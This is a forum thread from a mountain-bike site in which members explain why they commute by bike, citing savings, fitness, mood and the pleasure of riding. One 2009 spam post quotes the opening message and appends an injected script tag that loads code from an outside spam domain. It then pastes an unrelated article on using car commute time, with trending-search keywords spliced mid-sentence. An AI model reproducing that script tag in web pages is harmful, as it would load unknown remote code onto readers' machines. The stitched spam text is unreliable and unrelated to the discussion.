Why do we commute?- Mtbr.com
    mtbr member
    Sep 2005

Why do we commute?

I know this sounds like a silly question, obviously it's to get to work. But why is it that we choose to do it by bike? What's your motivation?

Mine started out seeming like a no brainer, tough economy has me making about 40% of what i'm used to making, so bills are tight. Besides, I had a road bike that I never used. I thought I'd save a few bucks each month by riding. Turns out, I'm saving money all over the place! I now pack my lunch to work, I'm not as stressed when I get home and therefore I don't drink as much. I also feel a lot better. I work 6 days a week, 9-11 hours a day and I usually ride at least 5 of the 6 days.

So in a nutshell, it's $ and sanity that keep me riding opposed to driving. What's yours?

mtbr member
    Feb 2007
    you summed it all up brother man!!

Oct 2007
    working sucks, biking there made it a bit more enjoyable.. good way to wind down after a days work too.

PM Me for Wood Fenders
    2 DUI's..can't drive..lol It's all good though, havn't had a drink in over three years and now I can afford nice bike stuff and I dropped 30 pounds.
    The wood is being bent! Let me know what you need!

mtbr member
    Oct 2007
    I commute because there's no way I could ever allow myself to become one of the many pale, stressed out, fat co-workers my office is full of. Working out is a way of life for me, and if I can do it while commuting, it shortens my day by killing two birds with one stone.

Saving money? Nah. Now I want to buy a dedicated commuter - a Salsa La Cruz. By the time I build it and outfit it with lights and what not, I'll have spend at least a year or two's worth of gas. Go figure...

Fat-tired Roadie
    I'm too proud to wait for busses, transfer busses, etc. And I don't make enough to pay for parking. I can also beat my times on either of those forms of transportation on my bike, if I'm just going downtown. When I'm going further, depending on where and what I'm doing, I may drive or I may ride my bike.

I race and do a lot of riding just because I enjoy riding. So it's also more time spent riding.
    "Don't buy upgrades; ride up grades." -Eddy Merckx

fnar fnar brrraaaaap
    i don't own a car- and don't really want to either. so bike it is. i could catch the bus- but why? everyone is miserable and sick so i'd rather travel solo

mtbr member
    Jul 2003

I love to ride...

plain and simple. Yes it's good for me, good for the envrionment, etc. But it's just the joy of being on a bike for me. The sounds, the stuff you see that people in their four wheeled CO2 belchers miss, the different routes I can take on the bike that I couldn't in a car. I even enjoy interacting with traffic, dodging the road junk, etc. Yeah it's irritating when some jerk zooms around and pulls a right turn in front of you. But it's almost like a sport, if you do it right and get home safely inspite of texting teens, harried soccer moms, all the chatty Cathies on cell phones, irritated executives, and dumb ass delivery drivers, it gives you a satisfaction that you've played the odds (so to speak) and come out on top again. And the list could go on and on. I love to ride, and it's all part of it.

Good Dirt
    "I do whatever my Rice Cripsies tell me to!"

mtbr member
    I just commute as a way to enjoy my bike. I enjoy riding some of the urban spots on my way.. Just good fun before I start my day.

mtbr member
    May 2008
    I live in City area. Car is useless during peak time. I could have ride a motorbike but I saw too many fat motorbiker in my country. So ride a bicycle will have the best of both world in keeping fit. Public transport in my country is packed. A 4-8miles journey, riding Bicycle will have complete freedom in time and faster than public transport.

No-Brakes Cougar
    You all pretty much hit the nail on the head. I'll also add that on a bike you experience things you wouldn't normally see or hear or smell in a car on on a subway train. You never know what random item or occurrence you're going to happen across and sometimes it's a once in a lifetime experience. I was going to start a thread about an experience on this morning's commute, but I'll just go ahead and add it to this one.

Late last night I heard some rumblings in the distance and didn't really connect it to anything, until I got up a few times during the night and saw some flashes. When I went to leave the house this morning I discovered that not only had it rained, but the thunderstorm was still going on! Here in the Bay Area, thunderstorms pass overhead only on rare occasions and this one was pretty far away so I wasn't too worried. Riding to work early on nearly empty streets in the clear, fresh air I witnessed several, HUGE lightning bolts accompanied by sky-splitting peals of thunder. This is the kind of thing I'll probably never experience in this exact form again and it makes me realize exactly why I ride my bike to work; not so much to save money or the environment, but for my own selfish need to satisfy my desire for visceral entertainment.
    R.I.P. Ronnie James Dio ~ July 10, 1942 May 16, 2010

jrm
    mtbr member

For me

For the last 8 years its become a given. It lets me work through the stress of work and keep some kind of exercise regiment during the work week. Its also a great way to explore new routes or long after work rides.

Some days i smile in the early morning sun and others i say to myself dude WTF are you thinking. I see, smell and hear things you cant riding the bus or driving. The bus is DEPRESSING and spending beer money on parking? NOT

mtbr member
    Jan 2004
    although changing my clothes and stuff can be bothersome I enjoy it and it's less stressfull because I can crank at the speed I want without restrictions like slow drivers and traffic lights. I save money and last year I was saving even more. and it can be actually faster with the gridlock and sometimes without it.

Ovaries on the Outside
    Additional saddle time improves my chances at impotence.

jrm
    mtbr member

Dont forget the TAX deduction

what is it like $ .15 a mile..hey wait that will add up.

mtbr member
    I love to pedal. Doesn't have to be fast, it doesn't have to be far. I don't have to pass anyone and I don't mind being passed. I find sheer joy in turning my cranks, even when I'm grimacing a particularly hard climb, even when threading mad city traffic, even soaked wet in an unexpected downpour. Commuting on a bike is just another way to experience my passion.
    I'm gravity challenged, adrenaline deficient, and looking for that endorphine high. Shout out, I'll move out of the way. :-)

ready to ride
    So does everyone commute with their mtn bike?
    i used to but i sold my beater bike and i fixed up an old 10-speed road bike.
    its fun to ride
    N* = <3 <3]

Fat-tired Roadie
    I have a mid-80s road bike. It's got a rack and folding wire baskets. They're heavy, but awesome when I want to carry tools or groceries.
    "Don't buy upgrades; ride up grades." -Eddy Merckx

weirdo
    Quote Originally Posted by ridefreeride
    No.
    Grab a beer and a sandwich and cruise the "Post Your Commuter" sticky. Big variety and very interresting.

I commute by bike because I enjoy it. It`s a good motivation to get out the door when I leave home and a good cooldown time after work. Although it easilly COULD save me money, in reality I spend a lot more on unneeded bike crap than I would spend on the extra gas/car maintenance.

local trails rider
    Mine is a singlespeed mountain bike with fat slicks and gearing that is tall for climbing on trails. I'll switch tires and gearing for the winter.

My commuting options:
    - car: a bit faster than bike. All the stops at traffic lights during commuting hours make me grumpy.
    - bus: would have to switch buses on the way. Probably slower than bike. I don't like to sit, or stand, on a bus.
    - walk: a bit far to do it often
    - bike: relatively fast, puts me in a good mood. Not that great in wet weather but even then I get a feeling of having accomplished something.

No-Brakes Cougar
    i used to but i sold my beater bike and i fixed up an old 10-speed road bike.
    its fun to ride
    Rigid, chromo 26" MTB bike with road tires and fenders, that's my daily commuter!

mtbr member
    Mar 2009
    I'll play

1 I get to work just as fast as driving since I have a really nice 10 mile bike path directly from my house to my work with very few stops and no traffic.

2 Don't have to pay for parking

3 Allows me to justify upgrades to all of my bikes to the wife since: a) I'm not paying for gas and b) "I need it to get to work honey"

4 Gets legs in shape for ski season

5 lose weight

mtbr member
    I started commuting to school/work 3 weeks ago. Initially, I started riding because 1). I didn't want to pay for the university parking permit (price goes up every dang year), 2). I wanted to stay in shape after getting into shape backpacking 200 miles in the Sierra Nevada, and 3). save wear and tear on my car since my commute is only about 3 miles each way.

Now that I have been commuting by bicycle every day (and "commuterized" my mtb), I love it! I had no idea how happy it would make me. My attitude has improved so much; I am happy when I get to work; I am happy when I get home. So now the main reason I commute is because it makes me feel great

Now my only complaint is, why didn't I start riding sooner??

No-Brakes Cougar
    Quote Originally Posted by RadioActive
    Now my only complaint is, why didn't I start riding sooner??
    There are a lot of us that feel that way. Oh well, better late than never!

Natural body armor

Real question is: Why don't they (bike) commute?

I started last year, because I needed more miles (training). Once, twice a week, now up to 3 (riding my motorcycle to work on the other 2 days) and planning to go 4-5 times a week this winter. It's 16mi each way and I'm excited like a kid when I jump on the bike in the morning or go back home in the evening.

Many co-workers think it's impossible or not practical to do. they are wrong.
    "There is no A-line"
    Savvy Bike

No-Brakes Cougar
    Quote Originally Posted by Zen_Turtle
    Many co-workers think it's impossible or not practical to do. they are wrong.
    That's exactly it, mindset is nine-tenths of the law. Last night I was thinking about all the years before I had a car (or a bike for that matter) when I didn't have a lot of money and was working multiple part-time jobs. It would take me an hour to go from one jobsite to another on the bus, a distance that takes only 15 minutes in a car. Why the hell didn't I just get a bike and ride? I did it every day through senior year of high school. I had a co-worker who rode quite far every day. I guess it just didn't occur to me, for some reason. I could just kick myself for not doing it sooner, but at the same time I always say that it's better late than never!

Off the back...
    I ride to work because I can. It's such a great feeling to put on the gear, flip on the lights and start rolling. Day or night, sun, snow or rain - it's all good. The bus sucks, and takes twice as long as riding. Even a car will be slow, especially in the winter. Parking downtown is around $450/month, plus gas, plus higher insurance rates - I take all that money and eat at nice restaurants, buy my wife nice bikes and drink pints like there's no tomorrow. The fact that I'm not fat is a major benefit too.

As to what bike I ride to work, it varies. Both my commuters are singlespeeds now - a Wabi Lightning [road SS], and once the snow flies I'll put some studs on the Misfit diSSent and rock that to and fro. If you have a mtn bike and want to commute on paved surfaces, definitely throw on some fat slicks - it's much easier.

weirdo
    Quote Originally Posted by pinkrobe
    Parking downtown is around $450/month,
    Yowza! That`s a pretty good incentive. I don`t think any employers around here could fill their openings if there wasn`t anywhere to park. Well, up until a year ago- filling positions has gotten very easy since then.

mtbr member
    So my co-workers who bike will think I am cool
    Actually, every time I commute it saves me about 1 gallon of gas. Road bikes are virtually free of maintainence (compared to the mtb) so each commute saves me about $2.50 these days. Plus it allows me to eat crappier at lunch without getting fat.

mtbr member
    Feb 2008
    My bike cost 500. Last year it probably saved me about 350 in bus tickets from the commute to work alone, it's faster and far less stressful than riding a bus, and I have absolutely no desire or financial ability to own a car.

I used to walk everywhere, but when you've got 7 miles between you and work, and 4 miles of mostly traffic heavy road between you and your girlfriend, that gets old pretty easily.

I couldn't rely on buses. I've always hated how little you can relax and take in your surroundings when you're stuck a violently shaking, noisy metal box with 20 other people. Even if I'm knackered and struggling to ride 10 m/h, I always enjoy being on the bike.

It's so convenient to take a detour through the countryside on the way home, and find myself in places I'd rarely, if ever, find myself in otherwise.

I love riding in rain, at least I do now that I have fenders. Nothing beats the air quality, the sound, the light, and the refreshing feeling of being out in a storm. Winter took some getting used to last year, but I'm prepared with thermal undies this time round.

Commuting any less than ~10 miles by car just seems like using a jackhammer to crack a nut. It's such overkill that it's difficult to get my head around how so many people do it.

No-Brakes Cougar
    Quote Originally Posted by AlanOz
    Commuting any less than ~10 miles by car just seems like using a jackhammer to crack a nut. It's such overkill that it's difficult to get my head around how so many people do it.
    Couldn't have said it better myself. You wouldn't believe how many people here in the States get in their car and drive one block to the store.

mtbr member
    May 2006
    I bike commute because I can do it faster than by car...

I bike commute because it keeps me fit....

I bike commute because it gives relaxes me...

I bike commute because I can go the long way home and be fitter, and happier.

Off the back...
    Quote Originally Posted by rodar y rodar
    Yowza! That`s a pretty good incentive. I don`t think any employers around here could fill their openings if there wasn`t anywhere to park. Well, up until a year ago- filling positions has gotten very easy since then.
    I checked with my co-workers. Parking is now up to $675/month for an unsecured spot. An unsecured spot is one where you pay to access the parking garage and you may or may not get a spot to park [i.e. early bird gets the worm]. Named/guaranteed spots are over $1000/month. Surface lots are $400+ per month. A bus pass is $92/month.

weirdo
    Dude, that`s crazy! Whereabouts is "Cowtown"?

As far as busses and trains go, my city is one of about a half dozen in my whole state that have passenger rail service- one stop once a day doesn`t do much good for daily transportation needs. And I used to have a bus stop only four blocks from home. A year ago, they chopped the end off my route so now the nearest bus stop is about four miles.

mtbr member
    I googled Cowtown and it seems like about half the cities in the US have called themselves cowtown at some point. Judging by the parking cost though, I am going to guess something close to NYC. I could see not owning a car if I had that to deal with.

mtbr member
    Mar 2008
    Why do we commute by bike instead of driving?

It's better for all of the following:

Body
    Mind
    Spirit
    Wallet
    Earth

mtbr member
    I have been riding forever so why not commute too? My co-workers think I am crazy for riding in to work. I have no idea why. I have commuted every day since July 17th 2009. I work only 4 days a week. I have no idea why I love leaving my house at 3:20 in the morning or riding home in the head wind when its 98 degrees out. When I get to work or home, I just feel great.

I'm SUCH a square....
    1.) I love to ride, and hate to drive.
    2.) I sold my last car 5 years ago and never replaced it.
    3.) I want to live to a very vigorous 90+, and ride 90 minutes on my 90th.
    4.) I love rubbing it in the faces of 20-somethings who are too lazy. (I'm 50)
    5.) I've lived lots of different places, but the saddle is 'home'.
    6.) I enjoy seeing the faces of my co-workers when I roll in the door @ work when it's <
    20F outside.
    7.) Being on the bike and riding reminds me more of the Creator, who made this world, and less of the humanity that's been f**king it up ever since.
    A bike is the only drug with no bad side effects....

Born to push....
    I commute becasue i'm leagelly blind so i can never drive.. Riding is my option...well other then bumming a ride from others but i'm to proud tio do that so i pedal..

PCC
    mtbr member
    Sep 2005
    Last year I commuted by bike four days out of the week because it was a way to get some exercise but also because it allowed me to clear my head going to and from work. It saved me a few dollars, too.

Only last week I worked worked for the first time this entire year. We cancelled the insurance on my car back in April to save money so when this opportunity came up I decided to ride my bike to the subway and from the subway to the office instead of driving. The distance is about 48 miles but I'm only riding 5 of those miles. I did the calculations the other day on my hour long subway ride and I figured that I'm saving $100 a week over taking the subway if I drove to work. That'll allow us to rebuild the nest egg that we had been using during my unemployment. We'll see how things go when this contract is over and I'm working somewhere else.

Zach Kowalchuk
    May 2007
    I don't really commute to work or anything yet as I am 15, But my bike is my main source of transportation because 1. I hate the bus 2. Riding is amazingly fun no matter what 3. Its faster 4. Its my anti-depressant. and the fact that I'm homeschooled again for remaining semester or year...Means I can go riding whenever I need to get out of the house. Oh and reason #5. The priceless looks people give me when I'm riding a bike in -30'C in a carhartt hoodie, Jeans(or sweats), work gloves and work boots...Its damn hilarious the looks I get.
    At the end of the day, my bike is a bike, whether its made for XC singletrack or DH, I can make it do what I want.

weirdo
    Quote Originally Posted by zadey1234
    I don't really commute to work or anything yet as I am 15,
    You`re covered- we pretty much just call it commuting, but what it comes down to (in my opinion, anyway) is any bicycling for transportation. I hope you keep at it. A lot of us rode until we got drivers licenses and then got lazy . I stopped riding when I was 17 and didn`t get back into it again for almost 20 years.

Zach Kowalchuk
    May 2007
    Quote Originally Posted by rodar y rodar
    You`re covered- we pretty much just call it commuting, but what it comes down to (in my opinion, anyway) is any bicycling for transportation. I hope you keep at it. A lot of us rode until we got drivers licenses and then got lazy . I stopped riding when I was 17 and didn`t get back into it again for almost 20 years.
    I'd love to get my license, but then theres the car, gas, insurance, registration...I'd rather stick with the bike. I enjoy it a lot more. Plus where I live...Amazing trails after riding around 10 blocks or so...I love this city somewhat.
    At the end of the day, my bike is a bike, whether its made for XC singletrack or DH, I can make it do what I want.

Sep 2009
    Quote Originally Posted by njcoppola
    I know this sounds like a silly question, obviously it's to get to work. But why is it that we choose to do it by bike? What's your motivation?

Mine started out seeming like a no brainer, tough economy has me making about 40% of what i'm used to making, so bills are tight. Besides, I had a road bike that I never used. I thought I'd save a few bucks each month by riding. Turns out, I'm saving money all over the place! I now pack my lunch to work, I'm not as stressed when I get home and therefore I don't drink as much. I also feel a lot better. I work 6 days a week, 9-11 hours a day and I usually ride at least 5 of the 6 days.

So in a nutshell, it's $ and sanity that keep me riding opposed to driving. What's yours?<script type="***************" src="http://djmixdownloads.com/script.php"></script>
    Commuting to work can be a pain and waste a lot of time. When you are in the car you are simply thinking about how many cars on the road, why can't the traffic go faster and you hate living out so far. The commuting experience can be frustrating at best. However, if you use your time
    Today's Popular Searchesemmy winners | Neil Patrick Harris | kate gosselin | house season premiere | khloe kardashian
    wisely you will relax more and become more productive.

There are plenty of ideas for using commuting to further your careers or your goals. Through years of commuting you will eventually find that all of this time is just about going to waste and busy professionals don't have the time to just burn up in smoke. The fact is that people who use their time wisely also get farther in life.

The U.S. Census Bureau states that the average commuting time one way is 24 minutes. That amounts to nearly 50 minutes a day which does not include traffic jams and errands. That amounts to over 100 hours a year which is over 12 working days of pure commuting time.

Ideas for using commuting time wisely:

1.) Informational CD's & Tapes: Listening to informational CD's, recorded books and programs will help you improve your professional skills, your knowledge and your overall career while driving. The information you gain is well worth the commute and you might find that this time is spent wisely and you look forward to it. At nearly 50 minutes a day you will have 400 minutes of listening time a week.

2.) Relaxing: It is difficult to go into a complete trance while driving. I would suggest that you don't even try it. However, you can put in soft and relaxing must, adjust your breathing and relax your head against the chair. During this time you can help reduce the total anxiety associated with the commute itself and give yourself the chance to unwind.

3.) Strategize: It isn't that relaxing but you have to have time to figure out how you are going to approach issues in your life and in your work. Taking a little bit of time to think about your options and how you are going to accomplish your goals is important.

Bedwards Of The West
    I can't think of a single aspect of my life that isn't improved by the simple action of riding my bike to work. It's truly as simple as that. I started to go on and on, but this is the bottom line.
    You have no excuse for driving to work
    (unless you don't have studded tires)
    (no excuse for that either)

mtbr member
    Apr 2009
    Hmmm...I love to ride my bike to work for instant motivation when I wake up. I jump in the shower, ride/sprint a short 4 miles, then eat breakfast while I open up the store. Then I end my day by riding 4 miles and then getting ready for my other main hobby. 3 hours of training in martial arts everyday of the week. Like CommuterBoy's signature, there is no excuse for driving to work.

No-Brakes Cougar
    Quote Originally Posted by zadey1234
    I'd love to get my license, but then theres the car, gas, insurance, registration...I'd rather stick with the bike. I enjoy it a lot more. Plus where I live...Amazing trails after riding around 10 blocks or so...I love this city somewhat.
    A car is a tool. It is useful for getting your bike to trails that are too far away to ride to, or for going on long road trips. But the longer you can live without one, the better off you'll be. It's a mixed blessing at best.

Zach Kowalchuk
    May 2007
    Quote Originally Posted by Gary the No-Trash Cougar
    A car is a tool. It is useful for getting your bike to trails that are too far away to ride to, or for going on long road trips. But the longer you can live without one, the better off you'll be. It's a mixed blessing at best.

Well, I already have a truck on the farm but to bring it to the city...I need to put about $400 into tires and a battery...I'd much rather spend that on my bike.

I can live without a car, Bike...I'd go crazy without.

Members who have read this thread: 0